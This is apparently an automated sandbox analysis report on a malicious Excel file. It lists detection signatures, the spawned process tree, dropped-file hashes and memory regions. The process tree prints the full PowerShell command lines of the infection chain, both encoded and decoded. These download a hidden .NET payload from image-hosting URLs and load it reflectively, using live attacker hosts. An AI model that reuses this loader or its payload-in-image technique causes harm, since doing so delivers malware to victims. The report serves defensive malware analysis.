Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    14/03/2024, 01:07

General

  • Target

    7b1a77f2519ad7d26ad2a4003597829596e20dc78bd3bf9033095b8d8441f3b3.xls

  • Size

    49KB

  • MD5

    689adce225d6b6799a678c27fd8990b8

  • SHA1

    00f947c99c8a861aaf03ad9d87fec009a76318b7

  • SHA256

    7b1a77f2519ad7d26ad2a4003597829596e20dc78bd3bf9033095b8d8441f3b3

  • SHA512

    0e274fb660526dc8bc125e4b6473ed6bfccc620118c78d45f1427509ab41db9abb9b5270195ee9eabc74e8be165b51a031892858ff7b2f71baca19fe5f38dc50

  • SSDEEP

    768:nyBP0oIwhIodPy81XjfDrmftTXgDXKQjwXqcGYVJd8Wj8jDk6U:n68jwqodKOYtTQDXKQsXqdEdRODk

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Abuses OpenXML format to download file from external location
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\7b1a77f2519ad7d26ad2a4003597829596e20dc78bd3bf9033095b8d8441f3b3.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2204
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1856
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:292
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\europelovers.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$empenhadamente = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwAxADYAJwAsACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQA0AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwA1ADAAJwApADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAcwA7ACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBQAFIATwBKAEUAVABPAEEAVQBUAE8ATQBBAEMAQQBPAC4AVgBCAC4ASABvAG0AZQAnACkAOwAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AbgBuAG4AaQBnAGkAcgBvAGUAdgBpAHQAYQBuAC8ANAAzAC4AOAAwADIALgA1ADQAMgAuADIANwAxAC8ALwA6AHAAdAB0AGgAJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAgACwAIAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwAsACcAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMAMwAyACcALAAnACcAKQApAH0AIAB9AA==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $empenhadamente));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2308
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nnnigiroevitan/43.802.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2816

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      c8d074c97220a1c6a3954b024aa79259

      SHA1

      9d7f78489c032fe66f2b435759c8945f33dbdd94

      SHA256

      c1e4e077080bd5d79365de25dcec4af93aefa420016e92467e8393e7e39763de

      SHA512

      5e5da368ad0e7ce3bf0ecc2f5f072739494c418f6b08a10849479a98b6502fa241682db9168dc6319591da40b412d9b9827e8c5e91566fba4efca1078894e76b

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{876FECC4-02C3-4646-89DA-0F5E23D0D6D2}.FSD

      Filesize

      128KB

      MD5

      100ad9f627d3288853045a79a90d9cec

      SHA1

      6896979da0785a0770b5d689ae1e84d171145d0c

      SHA256

      7ead19ef2ae31cc18a567716f004dd3c03fae749aef6379853345cfda72f9cef

      SHA512

      4e9d4536cc9d59ef65451c2dd2f80cb7aec3b9c5ea9671077da535896c9b5771c18077f696c553f98f2f039a9e0229d0b2b4c3a0c2d7d34f0bee0315236a6a92

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      5c5b99d392b62b20d28a49cc45734d56

      SHA1

      ef54aab229b0e5b300a17d67cddbedcbda02ef8a

      SHA256

      fa92d1e988fad2d6e1a361f277e3a14dd83da6317e577715d2d23d1e995a6743

      SHA512

      96ae3a08ec109881626f35f859d9e30c880e238bd42c0e7dd3d16e178156bd39a432d576a3fbf25668117e0d6567da421b5f24ee7beea3f646070a5e1305ce32

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5CA4297D-854D-4F1F-8182-846F3C207D4E}.FSD

      Filesize

      128KB

      MD5

      04154bb583b4f596382f9b6747bea255

      SHA1

      fd31a72086ede5c992966ddb041d58e42266d865

      SHA256

      a39f11dff8b651cc1bd6820f06651f1c8e86dfad584701c38232471e4987266c

      SHA512

      5c5bb61a65d52cc93fc3ca5a381770e48732874f26e42617d1f1ffdf8b87e5ca88df1c7bcb9402703ccadd89a2d3060ce1763abbba83477032215228828d3ec9

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5CA4297D-854D-4F1F-8182-846F3C207D4E}.FSD

      Filesize

      128KB

      MD5

      1fce8aca7ecd004ded9f002b3a709ae3

      SHA1

      a090cc9d6a503411a2fd2670de36550215372b99

      SHA256

      12d3e278cb49bf4bb2e9d4cd0eb2278cd57856aaecdfdc3149e2bdfe9d98b096

      SHA512

      da0a2fc31e8e80e2745f3c9ab011477b4c2cbe7e8cd6a0270bec4c8a328bc297370846eb8b8d08312b3cae4a0e4ee064b56ae9915a6c9febb00bf818d13776f2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HQQVSTWU\northloverseethedifferentbetweenuandmetodevelopthelovestoryforkisstounderstandhow____muchiloveherwithallmyheartseriosuly[1].doc

      Filesize

      71KB

      MD5

      517964b302b8702ec6cc70810a5a78ad

      SHA1

      7505ff5683f7b17b06d5c8d56b33859f95f5e891

      SHA256

      0b4f1a7c2cef91d6a29b1f293e9cde83b9a012c8f9d83d0cf3ee2f86ef493bd2

      SHA512

      c8dbaf2a5f29cd17a1a5e6254c3320d92e4b4f6ebbce697da08fbb1aad8476512e473e678e97ee34e3c78ef1115abb470bdd940a7749fd4d715a8462e5a1c8cc

    • C:\Users\Admin\AppData\Local\Temp\CabB695.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarB802.tmp

      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Users\Admin\AppData\Local\Temp\{E035CFA9-C563-4AD5-876B-89593A3B8DF7}

      Filesize

      128KB

      MD5

      137ccd7761bd9b07f36d6c7db1e3fa11

      SHA1

      6bb9ae6e39c1b43f3d786125f757cca801e50330

      SHA256

      1285128fa4c36273e23ce441cecf7761dab30aa655a83319e03ce33272d2a073

      SHA512

      51ffb92380ef46d0b57bf63e365c86e8b6899e9c94a3993768c3bdcfa524042d3c15961d7b019ddd5d4d2f13ac7e361438de576f2919336deac73e63720ccaaf

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0bf5cb88517f48cee26c0f1d81e7457f

      SHA1

      a148bb89660bc0d47462785b4f70f38dcfb08c4c

      SHA256

      62106371e2ca912aa5422f6b9b606ae7df8d58b9a05cf766a4a9f9f59aa4b929

      SHA512

      579f3292b0e5da18b409671939bdd30ec7aa0a935b0b17dabbd8573df0c25337b4790c046a278a12c24d7f51f16868bca671e8f3d615d8ff28904a7260b7fa67

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      527f342cd39131229c20f664e1c49bed

      SHA1

      52c06b57eecb1df1475f23a0afab52587cb5312d

      SHA256

      8d1529270088cf02a968c4282db17be5b0754708b7c1f628b645d7904fbae132

      SHA512

      2b5c2a19ff6ece705e41f1b227ed31df8c60e095530877527e799944cfc60cfce94a8a351c2bb04ffa659a4701af6d6fa77d6d6e33f68123e353ec67ddea98e1

    • C:\Users\Admin\AppData\Roaming\europelovers.vbs

      Filesize

      31KB

      MD5

      3b53926a941e1b54a261e4a336d54394

      SHA1

      23248a62a07727c78dd13c90ca3667d1d7850b1c

      SHA256

      6931886419b602a69952a4e49b32c05a71da665b9f202070524df74775e1abf5

      SHA512

      d744d36533bd375484ffed83e36ca488413f65f6135d6a44b9eb8bc5985d20a8b4dbe31ea5a6064cd7b7f5298a9f212ce5539382fa25628d3399a227351f99cd

    • memory/2204-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2204-8-0x0000000001E70000-0x0000000001E72000-memory.dmp

      Filesize

      8KB

    • memory/2204-215-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2204-1-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2204-101-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2308-180-0x0000000002620000-0x0000000002660000-memory.dmp

      Filesize

      256KB

    • memory/2308-188-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2308-96-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2308-97-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2308-98-0x0000000002620000-0x0000000002660000-memory.dmp

      Filesize

      256KB

    • memory/2308-99-0x0000000002620000-0x0000000002660000-memory.dmp

      Filesize

      256KB

    • memory/2308-100-0x0000000002620000-0x0000000002660000-memory.dmp

      Filesize

      256KB

    • memory/2308-113-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2512-7-0x00000000036B0000-0x00000000036B2000-memory.dmp

      Filesize

      8KB

    • memory/2512-3-0x000000002F9D1000-0x000000002F9D2000-memory.dmp

      Filesize

      4KB

    • memory/2512-211-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2512-210-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2512-112-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2512-5-0x00000000726CD000-0x00000000726D8000-memory.dmp

      Filesize

      44KB

    • memory/2816-108-0x00000000027A0000-0x00000000027E0000-memory.dmp

      Filesize

      256KB

    • memory/2816-184-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-185-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-186-0x00000000061D0000-0x000000000625D000-memory.dmp

      Filesize

      564KB

    • memory/2816-187-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-107-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-183-0x00000000027A0000-0x00000000027E0000-memory.dmp

      Filesize

      256KB

    • memory/2816-182-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-109-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-110-0x000000006A820000-0x000000006ADCB000-memory.dmp

      Filesize

      5.7MB

    • memory/2816-111-0x00000000027A0000-0x00000000027E0000-memory.dmp

      Filesize

      256KB